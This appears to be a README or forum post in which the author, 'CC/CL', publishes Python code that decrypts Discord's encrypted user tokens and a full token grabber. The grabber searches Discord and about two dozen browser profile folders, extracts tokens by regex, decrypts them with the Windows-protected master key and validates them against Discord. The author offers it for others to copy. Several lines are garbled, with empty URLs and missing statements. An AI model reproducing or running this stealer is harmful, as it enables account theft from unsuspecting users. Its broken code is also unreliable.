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All the info's about token encryption in one repository

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All the info's about token encryption in one repository

So, as we all know, Discord recently started encrypting User-tokens. I had them decrypted in under a day but kept it secret. Now that they termed me once again, here we are. I'll publish the exact changes, new regex & decryption.

So, Discords new Token encryption is based off of the "Electron SafeStorage API". If you heard of that before, you can literally just leave now as u know how to decrypt the new tokens lol. If not, heres the new stuff:

import requests
import os
import json 
import base64
from re import findall
from Cryptodome.Cipher import AES # New import 1, AES
from win32crypt import CryptUnprotectData # New import 2, win32crypt

appdata = os.getenv("localappdata")
roaming = os.getenv("appdata")
regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}" # new token regex tbw
encrypted_regex = r"dQw4w9WgXcQ:[^\"]*" # encrypted token regex

def getheaders(token=None, content_type="application/json"): # simply getting our headers for token validation
    headers = {
        "Content-Type": content_type,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
    if token:
        headers.update({"Authorization": token})
    return headers

def decrypt_payload(cipher, payload): # decrypting our payload, in this case tokens
    return cipher.decrypt(payload)

def generate_cipher(aes_key, iv): # getting an AES Cipher
    return, AES.MODE_GCM, iv)

def decrypt_password(buff, master_key): # decrypting the password, or in this case token with our masterkey & buff
        iv = buff[3:15] # getting the IV
        payload = buff[15:] # the encrypted token
        cipher = generate_cipher(master_key, iv) # our cipher
        decrypted_pass = decrypt_payload(cipher, payload) # decryping that shit
        decrypted_pass = decrypted_pass[:-16].decode() # and splitting away stuff nobody asked for
        return decrypted_pass # boom
        return "ratio"

def get_token_key(path): # token encryption uses a key stored in a different folder, lets get it, shall we? :)
    with open(path, "r", encoding="utf-8") as f: # opening the key file
        local_state = # reading our file
    local_state = json.loads(local_state) # and thats our local_state value

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) # now we want our key
    master_key = master_key[5:] # which we will eventually get after splitting off nonesense
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1] # and using win32crypt
    return master_key # boom, key

# Below is a token grabber using it, feel free to skid it, honestly im just mad. make sure to mention "CC/CL" in your code if u copy-paste it :)

def grabTokens():
    tokens = []
    paths = {
        'Discord': roaming + r'\\discord\\Local Storage\\leveldb\\',
        'Discord Canary': roaming + r'\\discordcanary\\Local Storage\\leveldb\\',
        'Lightcord': roaming + r'\\Lightcord\\Local Storage\\leveldb\\',
        'Discord PTB': roaming + r'\\discordptb\\Local Storage\\leveldb\\',
        'Opera': roaming + r'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
        'Opera GX': roaming + r'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
        'Amigo': appdata + r'\\Amigo\\User Data\\Local Storage\\leveldb\\',
        'Torch': appdata + r'\\Torch\\User Data\\Local Storage\\leveldb\\',
        'Kometa': appdata + r'\\Kometa\\User Data\\Local Storage\\leveldb\\',
        'Orbitum': appdata + r'\\Orbitum\\User Data\\Local Storage\\leveldb\\',
        'CentBrowser': appdata + r'\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
        '7Star': appdata + r'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
        'Sputnik': appdata + r'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
        'Vivaldi': appdata + r'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
        'Chrome SxS': appdata + r'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
        'Chrome': appdata + r'\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
        'Epic Privacy Browser': appdata + r'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
        'Microsoft Edge': appdata + r'\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
        'Uran': appdata + r'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
        'Yandex': appdata + r'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
        'Brave': appdata + r'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
        'Iridium': appdata + r'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\',
        'Ungoogled Chromium': appdata + r'\\Chromium\\User Data\\Default\\Local Storage\\leveldb\\',
        'Firefox': roaming + r'\\Mozilla\\Firefox\\Profiles'

    for source, path in paths.items():
        if not os.path.exists(path):
        if not "discord" in path: # we first check if its not discord, cuz then we wont need the encryption bs at all and grab it like normal
            if "Mozilla" in path: # ha, yeah.. firefox needs extra care lmfao.
                for loc, _, files in os.walk(path):
                    for _file in files:
                        if not _file.endswith('.sqlite'):
                        for line in [x.strip() for x in open(f'{loc}\\{_file}', errors='ignore').readlines() if x.strip()]:
                            for token in findall(regex, line):
                                r = requests.get("", headers=getheaders(token))
                                if r.status_code == 200:
                                    if token in tokens:

            else: # If its not firefox
                for file_name in os.listdir(path):
                    if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                    for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                        for token in findall(regex, line):
                            r = requests.get("", headers=getheaders(token))
                            if r.status_code == 200:
                                if token in tokens:

            for file_name in os.listdir(path): # if it is discord...
                if not file_name.endswith('.log') and not file_name.endswith('.ldb'): # we get all leveldb files and log files
                for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: # strip them
                    for y in findall(encrypted_regex, line): # and find our encrypted regex
                        for i in ["discordcanary", "discord", "discordptb"]: # we check all discord installs
                            token = decrypt_password(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_token_key(roaming+ f'\\{i}\\Local State')) # to decrypt the shit
                            r = requests.get("", headers=getheaders(token)) # and then we just check if its valid
                            if r.status_code == 200:
                                if token in tokens:

Enjoy, kids

Sincerely, CC/CL


All the info's about token encryption in one repository






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